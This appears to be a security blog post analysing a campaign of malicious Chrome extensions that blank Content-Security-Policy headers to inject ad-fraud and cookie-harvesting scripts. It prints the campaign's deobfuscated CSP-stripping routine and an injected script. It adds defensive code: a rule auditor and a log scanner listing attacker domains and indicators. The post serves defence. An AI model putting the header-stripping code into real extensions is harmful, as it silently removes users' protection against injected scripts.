Wednesday, March 12, 2025

16 Malicious Chrome Extensions Compromise Over 3.2 Million Users

Malicious Chrome Extensions Infect Over 3.2 Million Users, Abusing Extension Privileges for Fraud

A coordinated campaign involving at least 16 malicious Chrome extensions has compromised over 3.2 million users worldwide. Rather than exploiting any browser bug, the extensions abused the privileges legitimately granted to them to conduct advertising fraud and manipulate search engine optimization (SEO).

Discovered by GitLab Threat Intelligence in February 2025, the malicious extensions, including screen capture tools and ad blockers, hijacked user sessions, bypassed essential security measures, and injected obfuscated payloads to manipulate browsing behavior. Despite being removed from the Chrome Web Store, the risk persists for users who have not manually uninstalled the extensions.

GitLab's analysts found that the campaign's core technique was weakening the browser's own defenses, specifically by stripping Content Security Policy (CSP) headers from web pages. CSP is one of the main defenses against cross-site scripting (XSS); with the header gone, a page will happily load and execute whatever script the extension injects.

How the Attack Worked: Content Security Policy Stripping

Extensions such as Nimble Capture and KProxy used their background service workers to register declarativeNetRequest rules that blanked the Content-Security-Policy response header for the first 2,000 websites visited per session. With the policy gone, the attackers could inject scripts into those sites without the usual restrictions.

The code below (deobfuscated) shows how the extensions used Chrome's declarativeNetRequest API to nullify CSP protections:

// Background service-worker routine from the campaign, as published.
// `i` holds the hostnames already covered and `s` is the rotating dynamic-rule id.
// Both are declared elsewhere in the original; the initial values here are assumed.
const i = [];
let s = 0;

async function u(e) {
   // Register at most one rule per hostname.
   if (!(i.indexOf(e) > -1)) {
       i.push(e);
       try {
           // Rule ids cycle through 1..2000, so after roughly 2,000 hosts the
           // oldest rules are overwritten: this is the "first 2,000 sites" limit.
           return s > 1999 && (s = 1), s++, chrome.declarativeNetRequest.updateDynamicRules({
               addRules: [{
                   id: s,
                   action: {
                       // Overwrite the CSP response header with an empty value,
                       // which leaves the document with no policy at all.
                       type: "modifyHeaders",
                       responseHeaders: [{
                           header: "content-security-policy",
                           operation: "set",
                           value: ""
                       }]
                   },
                   condition: {
                       // Only top-level and framed documents for this host are touched.
                       urlFilter: e,
                       resourceTypes: ["main_frame", "sub_frame"]
                   }
               }],
               // removeRuleIds is applied before addRules, so a stale rule with the
               // same id is replaced instead of triggering a duplicate-id error.
               removeRuleIds: [s]
           })
       } catch (t) {}
   }
}

By disabling CSP, the attackers opened the door for injecting scripts and connected the extensions to remote configuration servers (e.g., api.nimblecapture[.]com) to download obfuscated JavaScript payloads.
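The rule shape above is exactly what an extension audit should look for. As an added example that is not part of the original article or of the GitLab report, the following JavaScript takes a list of declarativeNetRequest rules (the static rule files an unpacked extension lists under declarative_net_request.rule_resources in its manifest, or the output of chrome.declarativeNetRequest.getDynamicRules() captured from a running extension) and flags every rule that blanks or removes a security header on top-level or framed documents. The header list, the function names and the sample rules are assumptions made for this example; the first sample rule mirrors the one in the campaign's code.

```javascript
// Added example: audit declarativeNetRequest rules for security-header stripping.
// Not code from the campaign or from GitLab; names and thresholds are assumed.

// Response headers whose removal weakens the page's own defenses.
const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "cross-origin-opener-policy",
  "cross-origin-embedder-policy",
  "strict-transport-security",
]);

// Resource types that represent documents (where CSP actually matters).
const DOCUMENT_TYPES = new Set(["main_frame", "sub_frame"]);

// Returns one finding per rule that removes or blanks a security header on documents.
function findHeaderStrippingRules(rules) {
  const findings = [];
  for (const rule of rules) {
    if (!rule.action || rule.action.type !== "modifyHeaders") continue;
    const mods = rule.action.responseHeaders || [];
    // A rule with no resourceTypes applies to every type, documents included.
    const types = (rule.condition && rule.condition.resourceTypes) || [];
    const hitsDocuments = types.length === 0 || types.some((t) => DOCUMENT_TYPES.has(t));
    if (!hitsDocuments) continue;
    for (const mod of mods) {
      const name = String(mod.header || "").toLowerCase();
      if (!SECURITY_HEADERS.has(name)) continue;
      // "remove" drops the header; "set" to an empty string leaves no policy,
      // which is the trick the campaign used.
      const weakens = mod.operation === "remove" ||
        (mod.operation === "set" && String(mod.value || "").trim() === "");
      if (weakens) {
        findings.push({
          ruleId: rule.id,
          header: name,
          operation: mod.operation,
          urlFilter: (rule.condition && rule.condition.urlFilter) || "<all>",
        });
      }
    }
  }
  return findings;
}

// Quick manifest check: does the extension hold a declarativeNetRequest permission at all?
function manifestRequestsDNR(manifest) {
  const perms = [].concat(manifest.permissions || [], manifest.optional_permissions || []);
  return perms.some((p) => p === "declarativeNetRequest" ||
                           p === "declarativeNetRequestWithHostAccess");
}

// Constructed sample rules (not from any real extension). Rule 1 mirrors the
// campaign's rule; rules 2-4 are benign and must not be flagged.
const SAMPLE_RULES = [
  { id: 1, action: { type: "modifyHeaders",
      responseHeaders: [{ header: "content-security-policy", operation: "set", value: "" }] },
    condition: { urlFilter: "example.com", resourceTypes: ["main_frame", "sub_frame"] } },
  { id: 2, action: { type: "block" },
    condition: { urlFilter: "||tracker.example", resourceTypes: ["script"] } },
  { id: 3, action: { type: "modifyHeaders",
      responseHeaders: [{ header: "x-frame-options", operation: "remove" }] },
    condition: { urlFilter: "*", resourceTypes: ["image"] } },
  { id: 4, action: { type: "modifyHeaders",
      responseHeaders: [{ header: "cache-control", operation: "set", value: "no-store" }] },
    condition: { urlFilter: "*" } },
];

for (const f of findHeaderStrippingRules(SAMPLE_RULES)) {
  console.log(`rule ${f.ruleId}: ${f.operation} ${f.header} on ${f.urlFilter}`);
}
```

Static rules only cover what the extension ships; the campaign added its rules at runtime, so on a suspect machine the dynamic rule set has to be dumped from the extension's own context and run through the same function.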

These payloads, such as rcx-cd-v3.js, established bidirectional communication channels between the victim’s browser and the attacker’s infrastructure, hosted on platforms like Bunny CDN and DigitalOcean Apps. A unique x-do-app-origin header (e.g., 978bc8ed-09a8-444b-9142-df5a19366612) was used to tie all traffic to a single backend server.

Multi-Stage Delivery Chain

Once the CSP was stripped, the extensions loaded malicious configurations with dynamically generated UUIDs and hashed hostnames. For example, Nimble Capture injected rcx-cd-v3.js into web pages, which then bridged Chrome’s privileged APIs (like chrome.declarativeNetRequest) to the page context, enabling attackers to:

  • Modify ad display rules to prioritize fraudulent ads.
  • Block analytics services such as Microsoft Clarity.
  • Redirect affiliate traffic to domains like AliExpress and Surfshark via injected iframes.

Here’s an example of one of the injected scripts:

// Injected page script from the campaign (deobfuscated, as published). The helpers
// vsRead, getGeo, getDomain, Eftnc, ceqnc and gVWoc are defined elsewhere in the
// payload; the comments describe their role as inferred from the campaign's behavior.
async function YOKoc() {
    let sKBoc = await vsRead("s");   // read persisted state for this victim
    // Fire only for visitors geolocated to Germany, France or the UK who are on an Amazon domain.
    if (["DE", "FR", "GB"].includes(getGeo()) && getDomain().indexOf("amazon") > -1) {
        await Eftnc();
        // Pull the current affiliate/ad campaign from the attacker's backend...
        let MZfpc = await ceqnc("/exporter/get-campaign", { /* ... */ });
        // ...and apply it to the page (injected iframes and redirects).
        if (MZfpc) gVWoc(MZfpc.d);
    }
}

Additionally, these scripts harvested browsing histories and session cookies, potentially exposing user credentials and other sensitive data.

User Impact

Victims reported unexpected redirects and degraded browsing performance, both of which are direct side effects of the fraudulent ad injection and affiliate redirection described above.

Systemic Vulnerabilities and Attack Strategies

This campaign underscores a systemic weakness in the browser extension ecosystem. By taking over legitimate developer accounts rather than exploiting code flaws, the attackers pushed malicious updates through Google's review process and shipped them to users who had installed an extension that was trustworthy at the time.

Mitigation and Recommendations

To protect against such attacks, organizations should regularly audit installed extensions and the permissions they hold, restrict installs with Chrome's enterprise policies (ExtensionInstallAllowlist/ExtensionInstallBlocklist), and monitor for traffic directed at the campaign's domains, such as blipshotextension[.]com or orkproxyservers[.]site. Removal from the Chrome Web Store does not uninstall an extension that is already installed, so affected users must remove it themselves from chrome://extensions. Individual users should be wary of extensions requesting broad permissions (declarativeNetRequest, access to all sites) and promptly remove any extension that behaves unexpectedly.
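The domains above, the rcx-cd-v3.js payload name and the x-do-app-origin header value quoted earlier can be checked in bulk. As an added example that is not part of the original article or the GitLab report, the following JavaScript runs a small indicator match over HTTP proxy log records. The JSON-lines log format, the field names (client, host, path, headers) and the sample records are constructed for this example; the indicators themselves are the ones named in the article.

```javascript
// Added example: indicator matching over proxy log records.
// Not code from the campaign or from GitLab; log format and samples are constructed.

// Indicators quoted in the article (defanging brackets removed for matching).
const IOC_HOSTS = new Set([
  "api.nimblecapture.com",
  "blipshotextension.com",
  "orkproxyservers.site",
]);
const IOC_HEADER = "x-do-app-origin";
const IOC_HEADER_VALUE = "978bc8ed-09a8-444b-9142-df5a19366612";
const IOC_PATH_SUFFIX = "/rcx-cd-v3.js";

// Normalise a host (lower-case, strip port) and match it or any subdomain
// against the indicator list. Returns the matched indicator or null.
function hostMatches(host) {
  const h = String(host || "").toLowerCase().replace(/:\d+$/, "");
  for (const ioc of IOC_HOSTS) {
    if (h === ioc || h.endsWith("." + ioc)) return ioc;
  }
  return null;
}

// Returns the list of reasons one record is suspicious (empty array = clean).
function classifyRecord(rec) {
  const reasons = [];
  const ioc = hostMatches(rec.host);
  if (ioc) reasons.push(`host matches indicator ${ioc}`);
  // Header names are case-insensitive; normalise before lookup.
  const headers = {};
  for (const [k, v] of Object.entries(rec.headers || {})) headers[k.toLowerCase()] = v;
  if (IOC_HEADER in headers) {
    const v = headers[IOC_HEADER];
    reasons.push(v === IOC_HEADER_VALUE
      ? `${IOC_HEADER} carries the campaign's backend id`
      : `${IOC_HEADER} header present (value ${v})`);
  }
  if (String(rec.path || "").toLowerCase().endsWith(IOC_PATH_SUFFIX)) {
    reasons.push(`fetch of payload name ${IOC_PATH_SUFFIX.slice(1)}`);
  }
  return reasons;
}

// Parse JSON-lines text, skip malformed lines, and return one alert per suspicious record.
function scanLog(text) {
  const alerts = [];
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    let rec;
    try { rec = JSON.parse(line); } catch (e) { continue; }
    const reasons = classifyRecord(rec);
    if (reasons.length) alerts.push({ client: rec.client, host: rec.host, reasons });
  }
  return alerts;
}

// Constructed sample log (not real traffic): one clean request, one C2 config
// fetch, one payload download from an unrelated CDN host, one subdomain hit,
// and one malformed line.
const SAMPLE_LOG = [
  '{"client":"10.0.0.5","host":"www.example.org","path":"/","headers":{"User-Agent":"Mozilla/5.0"}}',
  '{"client":"10.0.0.5","host":"api.nimblecapture.com","path":"/config","headers":{"X-DO-App-Origin":"978bc8ed-09a8-444b-9142-df5a19366612"}}',
  '{"client":"10.0.0.9","host":"cdn.example.net:443","path":"/static/rcx-cd-v3.js","headers":{}}',
  '{"client":"10.0.0.9","host":"sub.blipshotextension.com","path":"/p","headers":{}}',
  'not json at all',
].join("\n");

for (const a of scanLog(SAMPLE_LOG)) {
  console.log(`${a.client} -> ${a.host}: ${a.reasons.join("; ")}`);
}
```

The path and header checks matter because the payload hosting moved across CDN providers; a host-only block list misses a payload fetched from a fresh domain, while the x-do-app-origin value ties all of the campaign's traffic back to the same backend.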

Fintter Security (https://fintter.com)
I’m a cybersecurity expert focused on protecting digital infrastructures for fintech and enterprise businesses. I specialize in Open Source Intelligence (OSINT) and use social media insights to help drive business development while defending against cyber threats. I offer full security services, including firewall setup, endpoint protection, intrusion detection, and secure network configurations, ensuring your systems are secure, well-configured, and maintained. I’m available for consultancy and security services. Contact me at info@fintter.com or via WhatsApp at +2349114199908 to discuss how I can strengthen your organization’s cybersecurity and business growth.